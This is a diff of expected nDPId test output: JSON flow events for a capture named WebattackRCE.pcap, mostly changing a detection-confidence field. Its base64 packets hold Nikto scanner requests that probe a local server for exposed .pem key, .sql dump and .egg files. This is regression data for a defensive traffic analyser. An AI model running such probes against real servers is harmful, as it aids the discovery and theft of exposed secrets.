+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 